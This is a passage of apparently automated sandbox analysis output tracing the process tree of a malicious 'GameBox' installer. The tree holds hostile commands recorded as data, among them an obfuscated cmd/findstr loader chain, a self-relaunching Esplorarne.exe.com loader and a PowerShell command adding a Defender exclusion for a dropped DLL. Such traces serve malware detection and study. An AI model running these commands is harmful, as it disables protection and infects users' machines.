                                                                  • C:\Users\Admin\AppData\Roaming\4631693.exe
                                                                    "C:\Users\Admin\AppData\Roaming\4631693.exe"
                                                                    6⤵
                                                                      PID:3012
                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                    5⤵
                                                                      PID:5140
                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                        6⤵
                                                                          PID:6996
                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:4152
                                                                        • C:\Users\Admin\AppData\Local\Temp\tmp75F2_tmp.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\tmp75F2_tmp.exe"
                                                                          6⤵
                                                                            PID:5600
                                                                            • C:\Windows\SysWOW64\dllhost.exe
                                                                              "C:\Windows\System32\dllhost.exe"
                                                                              7⤵
                                                                                PID:5772
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                7⤵
                                                                                  PID:7032
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd
                                                                                    8⤵
                                                                                      PID:7248
                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                        findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                        9⤵
                                                                                          PID:1252
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                          Esplorarne.exe.com i
                                                                                          9⤵
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:1940
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                            10⤵
                                                                                              PID:5476
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                11⤵
                                                                                                  PID:1332
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                    12⤵
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:5536
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                      13⤵
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      PID:8396
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                        14⤵
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:9144
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                          15⤵
                                                                                                            PID:8788
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                              16⤵
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              PID:8464
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                17⤵
                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                PID:8920
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                  18⤵
                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                  PID:5860
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                    19⤵
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:8320
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                      20⤵
                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                      PID:6204
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                        21⤵
                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                        PID:7036
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                          22⤵
                                                                                                                            PID:3360
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                              23⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                              PID:3268
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                24⤵
                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                PID:2860
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                  25⤵
                                                                                                                                    PID:8836
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                      26⤵
                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                      PID:3360
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                        27⤵
                                                                                                                                          PID:7700
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                            28⤵
                                                                                                                                              PID:8092
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                29⤵
                                                                                                                                                  PID:2204
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                    30⤵
                                                                                                                                                      PID:8500
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                        31⤵
                                                                                                                                                          PID:9472
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                            32⤵
                                                                                                                                                              PID:9712
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                33⤵
                                                                                                                                                                  PID:9880
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                    34⤵
                                                                                                                                                                      PID:10156
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        35⤵
                                                                                                                                                                          PID:7700
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                            36⤵
                                                                                                                                                                              PID:9324
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                37⤵
                                                                                                                                                                                  PID:9392
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                    38⤵
                                                                                                                                                                                      PID:9112
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                        39⤵
                                                                                                                                                                                          PID:9496
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                            40⤵
                                                                                                                                                                                              PID:8544
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                41⤵
                                                                                                                                                                                                  PID:10012
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                    42⤵
                                                                                                                                                                                                      PID:9416
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                        43⤵
                                                                                                                                                                                                          PID:8676
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                            44⤵
                                                                                                                                                                                                              PID:8304
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                45⤵
                                                                                                                                                                                                                  PID:10156
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                    46⤵
                                                                                                                                                                                                                      PID:8404
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                        47⤵
                                                                                                                                                                                                                          PID:9600
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                            48⤵
                                                                                                                                                                                                                              PID:5620
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                49⤵
                                                                                                                                                                                                                                  PID:9688
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                    50⤵
                                                                                                                                                                                                                                      PID:5652
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                        51⤵
                                                                                                                                                                                                                                          PID:8984
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                            52⤵
                                                                                                                                                                                                                                              PID:6340
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                53⤵
                                                                                                                                                                                                                                                  PID:5176
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                    54⤵
                                                                                                                                                                                                                                                      PID:7656
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                        55⤵
                                                                                                                                                                                                                                                          PID:9892
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                            56⤵
                                                                                                                                                                                                                                                              PID:9456
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                57⤵
                                                                                                                                                                                                                                                                  PID:7088
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                    58⤵
                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                    PID:5200
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                      59⤵
                                                                                                                                                                                                                                                                        PID:10228
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                          60⤵
                                                                                                                                                                                                                                                                            PID:9260
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                              61⤵
                                                                                                                                                                                                                                                                                PID:1364
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                  62⤵
                                                                                                                                                                                                                                                                                    PID:8356
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                      63⤵
                                                                                                                                                                                                                                                                                        PID:9828
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                          64⤵
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                          PID:6092
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                            65⤵
                                                                                                                                                                                                                                                                                              PID:10020
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                66⤵
                                                                                                                                                                                                                                                                                                  PID:3284
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                    67⤵
                                                                                                                                                                                                                                                                                                      PID:7668
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                        68⤵
                                                                                                                                                                                                                                                                                                          PID:8732
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                            69⤵
                                                                                                                                                                                                                                                                                                              PID:9588
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                70⤵
                                                                                                                                                                                                                                                                                                                  PID:6576
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                    71⤵
                                                                                                                                                                                                                                                                                                                      PID:9244
                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                          ping GFBFPSXA -n 30
                                                                                                                                                                                          9⤵
                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                          PID:7004
                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                  PID:4792
                                                                                                                                                                                  • C:\Users\Admin\Documents\5HOVqPMSt0RUswVaqwa1Xt59.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\5HOVqPMSt0RUswVaqwa1Xt59.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:7052
                                                                                                                                                                                  • C:\Users\Admin\Documents\2G66utGnXC0mcLppyPobWba5.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\2G66utGnXC0mcLppyPobWba5.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:6732
                                                                                                                                                                                  • C:\Users\Admin\Documents\6sk7f1KoUIxM__b4bDj0P0FJ.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\6sk7f1KoUIxM__b4bDj0P0FJ.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:6900
                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\6SK7F1~1.DLL,s C:\Users\Admin\DOCUME~1\6SK7F1~1.EXE
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:2256
                                                                                                                                                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\6SK7F1~1.DLL,XAVXMzV1OHdW
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                                          PID:8528
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\6SK7F1~1.DLL
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:4948
                                                                                                                                                                                      • C:\Users\Admin\Documents\OYL4FRWGSomep8E2y6CBpkWr.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\OYL4FRWGSomep8E2y6CBpkWr.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        PID:6316
                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:7100
                                                                                                                                                                                        • C:\Users\Admin\Documents\3Qhumsvy2RoRYhM1uaCzVl3m.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\3Qhumsvy2RoRYhM1uaCzVl3m.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:4648
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 480
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                            PID:900
                                                                                                                                                                                        • C:\Users\Admin\Documents\6joCqvG40PY9Ygo_1L3Mnv93.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\6joCqvG40PY9Ygo_1L3Mnv93.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                          PID:4136
                                                                                                                                                                                        • C:\Users\Admin\Documents\cZrfhjF2SOrSSABeFhpjNI6q.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\cZrfhjF2SOrSSABeFhpjNI6q.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:6204
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\6535725.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\6535725.exe"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:6940
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\2271695.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\2271695.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                PID:5188
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\5560846.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\5560846.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:804
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\8404870.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\8404870.exe"
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                    PID:2524
                                                                                                                                                                                                • C:\Users\Admin\Documents\wLD0p6ZLMohaNl1pWSlBKCvq.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\wLD0p6ZLMohaNl1pWSlBKCvq.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:3196
                                                                                                                                                                                                  • C:\Users\Admin\Documents\wLD0p6ZLMohaNl1pWSlBKCvq.exe
                                                                                                                                                                                                    C:\Users\Admin\Documents\wLD0p6ZLMohaNl1pWSlBKCvq.exe
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:7920
                                                                                                                                                                                                  • C:\Users\Admin\Documents\YDhkU7NzlTuLb0cQOsNlPPOT.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\YDhkU7NzlTuLb0cQOsNlPPOT.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:5124
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 660
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5128
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 644
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:8072
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 664
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5960
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 680
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5256
                                                                                                                                                                                                    • C:\Users\Admin\Documents\h72uO2hl72SKrwMKg6gGf1mM.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\h72uO2hl72SKrwMKg6gGf1mM.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:5904
                                                                                                                                                                                                      • C:\Users\Admin\Documents\pKyhUR3oiTJAtHdT1xAc0ev0.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\pKyhUR3oiTJAtHdT1xAc0ev0.exe"
